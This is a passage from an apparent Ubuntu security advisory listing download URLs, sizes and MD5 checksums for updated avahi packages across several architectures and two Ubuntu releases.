      Size/MD5:    73912 318d7c9a9efcfe77febbd44444f1db7b
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/avahi-dnsconfd_0.6.10-0ubuntu3.3_amd64.deb
      Size/MD5:    27072 85a0fde4bb33c883cd28cdd36c53c3d1
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/avahi-utils_0.6.10-0ubuntu3.3_amd64.deb
      Size/MD5:    36298 0f246592018f27f1022db67689df3582
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-client-dev_0.6.10-0ubuntu3.3_amd64.deb
      Size/MD5:    49252 e7d3032f5498453bc2ada8ae35d578d1
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-client3_0.6.10-0ubuntu3.3_amd64.deb
      Size/MD5:    41692 bae76262876993bcf997fb59654c9781
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-common-data_0.6.10-0ubuntu3.3_amd64.deb
      Size/MD5:    17800 8a93cc05f2d1d4af89da330299c46bc8
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-common-dev_0.6.10-0ubuntu3.3_amd64.deb
      Size/MD5:    54506 0da97a4ab182238bc28eb741e37def9b
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-common3_0.6.10-0ubuntu3.3_amd64.deb
      Size/MD5:    35796 a01c4c01f60d15c8787ec73332fb2de5
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-compat-howl-dev_0.6.10-0ubuntu3.3_amd64.deb
      Size/MD5:    50166 0a83a8a2bf1336beac90373c4622faf0
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-compat-howl0_0.6.10-0ubuntu3.3_amd64.deb
      Size/MD5:    35150 b22c3c8928077fde6111ccfb2e323721
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-compat-libdnssd-dev_0.6.10-0ubuntu3.3_amd64.deb
      Size/MD5:    46886 15c91d43dcca52f4219be1813de0a39c
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-compat-libdnssd1_0.6.10-0ubuntu3.3_amd64.deb
      Size/MD5:    29128 56a3cd596a7df6dae85cff76299ca641
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-core-dev_0.6.10-0ubuntu3.3_amd64.deb
      Size/MD5:   141546 2be43505c8f37daeb88c4641bab35f23
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-core4_0.6.10-0ubuntu3.3_amd64.deb
      Size/MD5:   105326 b86ba768de50b7d3dd4d1ca7ecadee84
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-glib-dev_0.6.10-0ubuntu3.3_amd64.deb
      Size/MD5:    21914 505fa676f140dc557c893eef2e8ecbd2
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-glib1_0.6.10-0ubuntu3.3_amd64.deb
      Size/MD5:    20470 614fe3acd2fca2d8251f290405bd7426
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-qt3-1_0.6.10-0ubuntu3.3_amd64.deb
      Size/MD5:    22990 e8d6bb0d6351004daadf5c7ebb928a74
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-qt3-dev_0.6.10-0ubuntu3.3_amd64.deb
      Size/MD5:    23114 a768a2fd63abe8baa8992f6481e81ae1

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/avahi-daemon_0.6.10-0ubuntu3.3_i386.deb
      Size/MD5:    68262 dc447f6f4f4a93e9d612cd3c19fd29bb
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/avahi-dnsconfd_0.6.10-0ubuntu3.3_i386.deb
      Size/MD5:    26176 59cc524ec04cef13144c9e09b759f8d1
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/avahi-utils_0.6.10-0ubuntu3.3_i386.deb
      Size/MD5:    33604 131e39117368c07b81a62fc373dccd1e
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-client-dev_0.6.10-0ubuntu3.3_i386.deb
      Size/MD5:    44122 4aa28bf872098a98c029bd9e99660c3e
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-client3_0.6.10-0ubuntu3.3_i386.deb
      Size/MD5:    37724 4d3353d39690017a86c0838b2280961e
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-common-data_0.6.10-0ubuntu3.3_i386.deb
      Size/MD5:    17804 bffe092a7189656bce5bd341268987da
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-common-dev_0.6.10-0ubuntu3.3_i386.deb
      Size/MD5:    49906 78d4703fb6ebc0c68166509987c1b0eb
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-common3_0.6.10-0ubuntu3.3_i386.deb
      Size/MD5:    32880 1cdc4b971d5d1e7a4b246fda72056f83
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-compat-howl-dev_0.6.10-0ubuntu3.3_i386.deb
      Size/MD5:    45336 d5ba5f3f952f4b19b488182ec5289692
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-compat-howl0_0.6.10-0ubuntu3.3_i386.deb
      Size/MD5:    31802 0a5f1361ea84804e9613db3c52e5f083
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-compat-libdnssd-dev_0.6.10-0ubuntu3.3_i386.deb
      Size/MD5:    44108 80754cbc643f205d44d050ea564ba333
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-compat-libdnssd1_0.6.10-0ubuntu3.3_i386.deb
      Size/MD5:    26684 640981f19a84116e785aa02a4ebd5ba7
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-core-dev_0.6.10-0ubuntu3.3_i386.deb
      Size/MD5:   120896 f64f1c17fc8f9b5a3094196fca9464a0
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-core4_0.6.10-0ubuntu3.3_i386.deb
      Size/MD5:    93002 b53e93d6b736af1221eb84410a09a672
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-glib-dev_0.6.10-0ubuntu3.3_i386.deb
      Size/MD5:    20838 c1185c3a3b37bf6bd95fa562b17963e9
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-glib1_0.6.10-0ubuntu3.3_i386.deb
      Size/MD5:    20022 4e3de895cc55efc689bba6a90845ff4f
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-qt3-1_0.6.10-0ubuntu3.3_i386.deb
      Size/MD5:    22674 422310c74e0988f03816fd5bd65de3cb
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-qt3-dev_0.6.10-0ubuntu3.3_i386.deb
      Size/MD5:    22364 e4079815a1994b57883e279a694f20f9

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/avahi-daemon_0.6.10-0ubuntu3.3_powerpc.deb
      Size/MD5:    71754 d4ea0a847efea22a8c7a0acad667fdb7
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/avahi-dnsconfd_0.6.10-0ubuntu3.3_powerpc.deb
      Size/MD5:    28164 f752545b3a9bd39fbcfbbf2bdde4a941
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/avahi-utils_0.6.10-0ubuntu3.3_powerpc.deb
      Size/MD5:    37840 aad32bcd6b2a99679d0cf3787c369d03
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-client-dev_0.6.10-0ubuntu3.3_powerpc.deb
      Size/MD5:    51124 3138c504ce94606dcf81cb27e13db03a
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-client3_0.6.10-0ubuntu3.3_powerpc.deb
      Size/MD5:    41474 ce703d4a2c66da2cd736c0f4763cc349
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-common-data_0.6.10-0ubuntu3.3_powerpc.deb
      Size/MD5:    17836 4088e095ad87fbc1dd1b6e115655602a
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-common-dev_0.6.10-0ubuntu3.3_powerpc.deb
      Size/MD5:    54858 1e325598600cd0dab595123cf93d38d9
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-common3_0.6.10-0ubuntu3.3_powerpc.deb
      Size/MD5:    37208 c9374c64c686518d837bf384a14dec76
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-compat-howl-dev_0.6.10-0ubuntu3.3_powerpc.deb
      Size/MD5:    50304 e6b915649a166012ec45785cdb71bfd1
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-compat-howl0_0.6.10-0ubuntu3.3_powerpc.deb
      Size/MD5:    35682 265d3f2aa23326c5b3f258531fa37ddf
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-compat-libdnssd-dev_0.6.10-0ubuntu3.3_powerpc.deb
      Size/MD5:    47574 cc77856fb50f3aa225e21618bb191654
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-compat-libdnssd1_0.6.10-0ubuntu3.3_powerpc.deb
      Size/MD5:    29276 29f907a4f66ef10c0e312bfade6b5026
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-core-dev_0.6.10-0ubuntu3.3_powerpc.deb
      Size/MD5:   147402 a03296f22fea345748e8184758d71bc5
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-core4_0.6.10-0ubuntu3.3_powerpc.deb
      Size/MD5:    98496 4ba2100ad4fdea70a924fa74247dc262
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-glib-dev_0.6.10-0ubuntu3.3_powerpc.deb
      Size/MD5:    22026 c48d98d2f66535016625e14d5d883eae
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-glib1_0.6.10-0ubuntu3.3_powerpc.deb
      Size/MD5:    22494 ddc95d5aa83974b99d43deca4ad33711
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-qt3-1_0.6.10-0ubuntu3.3_powerpc.deb
      Size/MD5:    24452 5ce2c55f4f82f3ac6a6120e5c6e56d49
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-qt3-dev_0.6.10-0ubuntu3.3_powerpc.deb
      Size/MD5:    23374 58a3c290db28263027b4ae49b6aa67b1

  sparc architecture (Sun SPARC/UltraSPARC)

    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/avahi-daemon_0.6.10-0ubuntu3.3_sparc.deb
      Size/MD5:    68774 b75a136c3170c30253f80bff5a384117
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/avahi-dnsconfd_0.6.10-0ubuntu3.3_sparc.deb
      Size/MD5:    26358 166f34d0f405a525d6014e1be95b9966
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/avahi-utils_0.6.10-0ubuntu3.3_sparc.deb
      Size/MD5:    33742 7050947fa108f063b0a042977307d6c6
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-client-dev_0.6.10-0ubuntu3.3_sparc.deb
      Size/MD5:    47390 cc029b0bd9fe94e62e1340a0185076df
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-client3_0.6.10-0ubuntu3.3_sparc.deb
      Size/MD5:    38420 ba040c4c46924b33f6c3c69ee7921ac2
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-common-data_0.6.10-0ubuntu3.3_sparc.deb
      Size/MD5:    17938 0a9449e51bcc9d12c1b1f4eff8a807d7
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-common-dev_0.6.10-0ubuntu3.3_sparc.deb
      Size/MD5:    52144 c134129de66e9879ba3e14b275a9960b
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-common3_0.6.10-0ubuntu3.3_sparc.deb
      Size/MD5:    34092 cbbe4e46dc79ab8b5f40e35683db4c2d
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-compat-howl-dev_0.6.10-0ubuntu3.3_sparc.deb
      Size/MD5:    48192 1961c1cba030608dfba293ad7991c16b
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-compat-howl0_0.6.10-0ubuntu3.3_sparc.deb
      Size/MD5:    33712 59b1f7a805993f2c78b8c165ddf05ae0
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-compat-libdnssd-dev_0.6.10-0ubuntu3.3_sparc.deb
      Size/MD5:    45574 7bdf5123c24249fd821c6e2b438d18e3
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-compat-libdnssd1_0.6.10-0ubuntu3.3_sparc.deb
      Size/MD5:    26986 666cd911b334609886565b6bee8043f4
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-core-dev_0.6.10-0ubuntu3.3_sparc.deb
      Size/MD5:   134396 b94f23799c3530d89fac55bc383e767c
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-core4_0.6.10-0ubuntu3.3_sparc.deb
      Size/MD5:    96280 aaf6107a016e3756a76a7d13e4a18712
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-glib-dev_0.6.10-0ubuntu3.3_sparc.deb
      Size/MD5:    21530 4c297c073383ade6c12fe39d8baab7bc
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-glib1_0.6.10-0ubuntu3.3_sparc.deb
      Size/MD5:    20344 4168e27b17bc325e6057828356c45e62
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-qt3-1_0.6.10-0ubuntu3.3_sparc.deb
      Size/MD5:    22362 d99683740c0bc3075185bfd4100d969a
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-qt3-dev_0.6.10-0ubuntu3.3_sparc.deb
      Size/MD5:    22372 71d0b12b9750cc75237459ba0addf533

Updated packages for Ubuntu 6.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/avahi_0.6.13-2ubuntu2.3.diff.gz
      Size/MD5:    13683 f2e16528e74bafb3cb615a46f8caf602
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/avahi_0.6.13-2ubuntu2.3.dsc
      Size/MD5:     1441 c5346b3055c2987dcd5e2a50e2c0ab06
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/avahi_0.6.13.orig.tar.gz
      Size/MD5:   895380 d1000689979105cc95b9ca102284aae4

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/avahi-discover_0.6.13-2ubuntu2.3_all.deb
      Size/MD5:    21968 934452dd98abd90691ecbcc52bc36b84
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/python-avahi_0.6.13-2ubuntu2.3_all.deb
      Size/MD5:    22700 2827f7e6f5c40fb7bf236c504f38a345

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/avahi-daemon_0.6.13-2ubuntu2.3_amd64.deb
      Size/MD5:    75596 a726f275e3432306f835cbf6651bf30b
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/avahi-dnsconfd_0.6.13-2ubuntu2.3_amd64.deb
      Size/MD5:    28948 e00ec133da98de9409c28dd12c81e20e
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/avahi-utils_0.6.13-2ubuntu2.3_amd64.deb
      Size/MD5:    41456 8ad80c06e62fddb3269fc4aa77bee84b
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-client-dev_0.6.13-2ubuntu2.3_amd64.deb
      Size/MD5:    50968 1a66162d96094e1cca91b8a7dd7b9a2b
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-client3_0.6.13-2ubuntu2.3_amd64.deb
      Size/MD5:    43532 9028ecc32c59bf71de16a7a8bb4eefc5
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-common-data_0.6.13-2ubuntu2.3_amd64.deb
      Size/MD5:    19782 c99f34cd3570d2427022a7f894b16a32
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-common-dev_0.6.13-2ubuntu2.3_amd64.deb
      Size/MD5:    56348 8a695cc9ba6909c24920063c9589a69a
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-common3_0.6.13-2ubuntu2.3_amd64.deb
      Size/MD5:    37828 f3759c519e05bfc23374f53f7a00d009
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-compat-howl-dev_0.6.13-2ubuntu2.3_amd64.deb
      Size/MD5:    51710 7d9f9caf28ff43d7a185b69548e4feb3
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-compat-howl0_0.6.13-2ubuntu2.3_amd64.deb
      Size/MD5:    37110 f7f086509d9103cdf9a3e1f2d7276a65
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-compat-libdnssd-dev_0.6.13-2ubuntu2.3_amd64.deb
      Size/MD5:    51152 0956c3943037aaa5b5e9538380dd5edb
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-compat-libdnssd1_0.6.13-2ubuntu2.3_amd64.deb
      Size/MD5:    32066 e478e5b1aae91cabb569cb48b9ee7c92
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-core-dev_0.6.13-2ubuntu2.3_amd64.deb
      Size/MD5:   143692 b7fe9aab64d8a465d8ee5eba2a284679
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-core4_0.6.13-2ubuntu2.3_amd64.deb
      Size/MD5:   107502 b98975ddad855cd8b1229e454f233cad
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-glib-dev_0.6.13-2ubuntu2.3_amd64.deb
      Size/MD5:    23802 bf16eee250c5381a6214ac38e72050b7
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-glib1_0.6.13-2ubuntu2.3_amd64.deb
      Size/MD5:    22378 d3efd955bb04a7d305cf92a8f35c889d
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-qt3-1_0.6.13-2ubuntu2.3_amd64.deb
      Size/MD5:    24672 23afbafdf8948602b004c2994b24aa1b
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-qt3-dev_0.6.13-2ubuntu2.3_amd64.deb
      Size/MD5:    24692 da6ab5f85c3405f9e45cc909a0bc2212
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-qt4-1_0.6.13-2ubuntu2.3_amd64.deb
      Size/MD5:    22626 fba5a7cb1ef6175a74267f9eacd978dd
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-qt4-dev_0.6.13-2ubuntu2.3_amd64.deb
      Size/MD5:    22694 172cb599356647eadcacf68f100426fa

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/avahi-daemon_0.6.13-2ubuntu2.3_i386.deb
      Size/MD5:    71454 a89b7523c9af5431df42f8198d18d7ce
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/avahi-dnsconfd_0.6.13-2ubuntu2.3_i386.deb
      Size/MD5:    28252 16f046a2c96fc5478ac747ca3e070a4f
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/avahi-utils_0.6.13-2ubuntu2.3_i386.deb
      Size/MD5:    39072 a085b0381b45d30ba01842d316820010
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-client-dev_0.6.13-2ubuntu2.3_i386.deb
      Size/MD5:    46834 dfab202af5fdc1e0ae1a199a9c35d346
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-client3_0.6.13-2ubuntu2.3_i386.deb
      Size/MD5:    40584 d848ca2189b6a218f92c5a9b90939072
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-common-data_0.6.13-2ubuntu2.3_i386.deb
      Size/MD5:    19788 bedab459cc2241d0aafc3f53f2b0a863
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-common-dev_0.6.13-2ubuntu2.3_i386.deb
      Size/MD5:    52754 a3415de7af80365940cbd7af1e2919c0
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-common3_0.6.13-2ubuntu2.3_i386.deb
      Size/MD5:    35938 d4fa86fda30ed01c1f74d723aa78a793
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-compat-howl-dev_0.6.13-2ubuntu2.3_i386.deb
      Size/MD5:    47642 66a7f58198d7545d8a5767bacf6eb0e5
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-compat-howl0_0.6.13-2ubuntu2.3_i386.deb
      Size/MD5:    34374 ce4b5053f8b5425694be1ca02b3ca128
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-compat-libdnssd-dev_0.6.13-2ubuntu2.3_i386.deb
      Size/MD5:    48718 8d26c96b9cfdd5541502a4a08ee787ad
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-compat-libdnssd1_0.6.13-2ubuntu2.3_i386.deb
      Size/MD5:    29946 a59b8a43a063d3caadcbb4e57f0fdbdd
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-core-dev_0.6.13-2ubuntu2.3_i386.deb
      Size/MD5:   126880 4547ed20a60a980aa3485c8a1d58770c
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-core4_0.6.13-2ubuntu2.3_i386.deb
      Size/MD5:    98850 157a270ee2c419cbc122eeb3a4417e9b
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-glib-dev_0.6.13-2ubuntu2.3_i386.deb
      Size/MD5:    23000 a92478e52dc3b4ce8d03cdd438a6591f
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-glib1_0.6.13-2ubuntu2.3_i386.deb
      Size/MD5:    22060 d90d3440a936bbd05474ba0c69a214db
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-qt3-1_0.6.13-2ubuntu2.3_i386.deb
      Size/MD5:    24614 3df0357df8233a3fdb5c0a23660e2fe9
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-qt3-dev_0.6.13-2ubuntu2.3_i386.deb
      Size/MD5:    24176 bf07b852f583b7ccbd2a7b78e713748f
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-qt4-1_0.6.13-2ubuntu2.3_i386.deb
      Size/MD5:    22456 1814895bcd154094c86e331cd6fac368
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-qt4-dev_0.6.13-2ubuntu2.3_i386.deb
      Size/MD5:    22356 46bd1e9563a06fa00f27431b9e3d133b

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/avahi-daemon_0.6.13-2ubuntu2.3_powerpc.deb
      Size/MD5:    73686 668058f42ff9de43251c7390ad07283c
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/avahi-dnsconfd_0.6.13-2ubuntu2.3_powerpc.deb
      Size/MD5:    30148 0f1655359c6eb3f9a41a84d65b4999fb
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/avahi-utils_0.6.13-2ubuntu2.3_powerpc.deb
      Size/MD5:    44178 bc90cef230b111e5c2d3f67117566b18
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-client-dev_0.6.13-2ubuntu2.3_powerpc.deb
      Size/MD5:    52882 3571c461ecf8d427852425f306544403
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-client3_0.6.13-2ubuntu2.3_powerpc.deb
      Size/MD5:    43342 8c57f697d5ffe4998788506f361237d7
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-common-data_0.6.13-2ubuntu2.3_powerpc.deb
      Size/MD5:    19816 74d835eefad633ee7608e16460ca6161
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-common-dev_0.6.13-2ubuntu2.3_powerpc.deb
      Size/MD5:    57054 a48ef41db6a82c2a7e757a931038fe37
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-common3_0.6.13-2ubuntu2.3_powerpc.deb
      Size/MD5:    39726 ca1b131937848969305b5df30bfc1390
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-compat-howl-dev_0.6.13-2ubuntu2.3_powerpc.deb
      Size/MD5:    52048 ee17631f4628ed62b6654c639fafb80e
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-compat-howl0_0.6.13-2ubuntu2.3_powerpc.deb
      Size/MD5:    37626 e1dc430edc6ffe32d507d4941e7e1fda
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-compat-libdnssd-dev_0.6.13-2ubuntu2.3_powerpc.deb
      Size/MD5:    51808 e03b02be0adfc86fb32784b4043e388d
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-compat-libdnssd1_0.6.13-2ubuntu2.3_powerpc.deb
      Size/MD5:    31916 ed8ba97e547681f970468271685bc75a
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-core-dev_0.6.13-2ubuntu2.3_powerpc.deb
      Size/MD5:   150664 8bc3c06407f9ce18e7d763a55a91b0c3
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-core4_0.6.13-2ubuntu2.3_powerpc.deb
      Size/MD5:   101496 c49aa9df436b3164b2db7a05d80399ad
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-glib-dev_0.6.13-2ubuntu2.3_powerpc.deb
      Size/MD5:    23922 8563159330eba74e5ca3ef79a41795b0
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-glib1_0.6.13-2ubuntu2.3_powerpc.deb
      Size/MD5:    24308 4bd4d8e8ed700007babe57be117250b9
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-qt3-1_0.6.13-2ubuntu2.3_powerpc.deb
      Size/MD5:    26296 e659816b7fec900448bd85fa7976511c
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-qt3-dev_0.6.13-2ubuntu2.3_powerpc.deb
      Size/MD5:    25008 eb7f27882234f8e05b66c192b2553354
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-qt4-1_0.6.13-2ubuntu2.3_powerpc.deb
      Size/MD5:    24238 dcb8716d4c43997f318da19f06704087
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-qt4-dev_0.6.13-2ubuntu2.3_powerpc.deb
      Size/MD5:    22858 91b44f03909ad6549b4fa03c937d6eb5

  sparc architecture (Sun SPARC/UltraSPARC)

    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/avahi-daemon_0.6.13-2ubuntu2.3_sparc.deb
      Size/MD5:    70822 6daaff788156623c88a3c2de5c6c45f6
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/avahi-dnsconfd_0.6.13-2ubuntu2.3_sparc.deb
      Size/MD5:    28214 652f08151c08c0f6e977ad6a0ada72b0
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/avahi-utils_0.6.13-2ubuntu2.3_sparc.deb
      Size/MD5:    38650 b25c7b6047925f0ce38c8cce90cc277c
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-client-dev_0.6.13-2ubuntu2.3_sparc.deb
      Size/MD5:    49366 f117bcc8e6d7e73cc77c36415d8e2faf
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-client3_0.6.13-2ubuntu2.3_sparc.deb
      Size/MD5:    40392 2e3678beedb042070b5dd816fda94e1e
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-common-data_0.6.13-2ubuntu2.3_sparc.deb
      Size/MD5:    19914 eb055a08cdc6bd125171118699732a8d
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-common-dev_0.6.13-2ubuntu2.3_sparc.deb
      Size/MD5:    54240 76cd83e761c29d46a4e10e65ac60e99c
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-common3_0.6.13-2ubuntu2.3_sparc.deb
      Size/MD5:    36378 597e53efe3bacd3ddbca28e7590ecb67
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-compat-howl-dev_0.6.13-2ubuntu2.3_sparc.deb
      Size/MD5:    49960 467b333faa50b52f0250d99dfac268b9
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-compat-howl0_0.6.13-2ubuntu2.3_sparc.deb
      Size/MD5:    35496 423d247176cfc112646d23fe5bbefa79
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-compat-libdnssd-dev_0.6.13-2ubuntu2.3_sparc.deb
      Size/MD5:    49786 f8cfac7e1a97053a28b2375101c6da89
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-compat-libdnssd1_0.6.13-2ubuntu2.3_sparc.deb
      Size/MD5:    29666 b82bb7c7ac7951ef41e135be3535f614
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-core-dev_0.6.13-2ubuntu2.3_sparc.deb
      Size/MD5:   136714 853844a19832e47b9cec56aa0bad412d
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-core4_0.6.13-2ubuntu2.3_sparc.deb
      Size/MD5:    98378 c443b38cbe72929a5bf11b7e12ad1126
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/libavahi-glib-dev_0.6.13-2ubuntu2.3_sparc.deb
      Size/MD5:    23388 ed2d4666b31336746d8f82450156fd91
